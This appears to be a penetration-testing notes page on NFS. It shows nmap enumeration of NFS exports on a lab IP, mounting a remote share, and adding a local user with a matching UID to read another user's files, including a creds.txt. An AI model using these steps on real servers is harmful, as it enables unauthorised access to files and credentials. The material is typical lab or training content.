NMAP
Scan port and info on NFS
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.181.201
...
111/tcp open rpcbind
| nfs-showmount:
|_ /var *
| nfs-statfs:
| Filesystem 1K-blocks Used Available Use% Maxfilesize Maxlink
|_ /var 9204224.0 1836540.0 6877088.0 22% 16.0T 32000
| nfs-ls: Volume /var
| access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION UID GID SIZE TIME FILENAME
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 .
| rwxr-xr-x 0 0 4096 2019-09-04T12:27:33 ..
| rwxr-xr-x 0 0 4096 2019-09-04T12:09:49 backups
| rwxr-xr-x 0 0 4096 2019-09-04T10:37:44 cache
| rwxrwxrwt 0 0 4096 2019-09-04T08:43:56 crash
| rwxrwsr-x 0 50 4096 2016-04-12T20:14:23 local
| rwxrwxrwx 0 0 9 2019-09-04T08:41:33 lock
| rwxrwxr-x 0 108 4096 2019-09-04T10:37:44 log
| rwxr-xr-x 0 0 4096 2019-01-29T23:27:41 snap
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 www
|_
MAC Address: 02:8E:3F:CE:25:87 (Unknown)
Additional info on nfs scripts
1
ls -1 /usr/share/nmap/scripts/nfs*
Mount a file System
Create a directory and mount it:
1
2
3
4
5
6
mkdir home
sudo mount -o nolock 10.11.1.72:/home ~/home/
kali@kali:~$ cd home/ && ls
jenny joe45 john marcus ryuu
Permissions on Mounted NFS
If you lack of permissions then it is possible to create a new user if owner has a UUID of 1014, and also read (r), write (w), and execute (x) permissions on it. What can we do with this information? Since we have complete access to our Kali machine, we can try to add a local user to it using the adduser command, change its UUID to 1014, su to that user, and then try accessing the file again:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
kali@kali:~/home/stefan$ sudo adduser pwn
Adding user 'pwn' ...
Adding new group 'pwn' (1001) ...
Adding new user 'pwn' (1001) with group 'pwn' ...
Creating home directory '/home/pwn' ...
Copying files from '/etc/skel' ...
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for pwn
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n]
Based on the output above, we can see that the new user has a UUID of 1001, which is not really what we need. We can change it to 1014 using sed and confirm the change took place. The -i option is used to replace the file in-place and the -e option executes a script. In this case, that happens to be ’s/1001/1014/g’, which will globally replace the UUID in the /etc/passwd file:
1
2
3
4
sudo sed -i -e 's/1001/1014/g' /etc/passwd
cat /etc/passwd | grep pwn
pwn:x:1014:1014:,,,:/home/pwn:/bin/bash
We will use the su command to change the current login session’s owner. Then, we will use id to display our current user ID. Finally, we will try to access the file again:
1
2
3
4
5
6
7
kali@kali:~/home/marcus$ su pwn
pwn@kali:/root/home/marcus$ id
uid=1014(pwn) gid=1014 groups=1014
pwn@kali:/root/home/marcus$ cat creds.txt
Not what you are looking for, try harder!!! :O)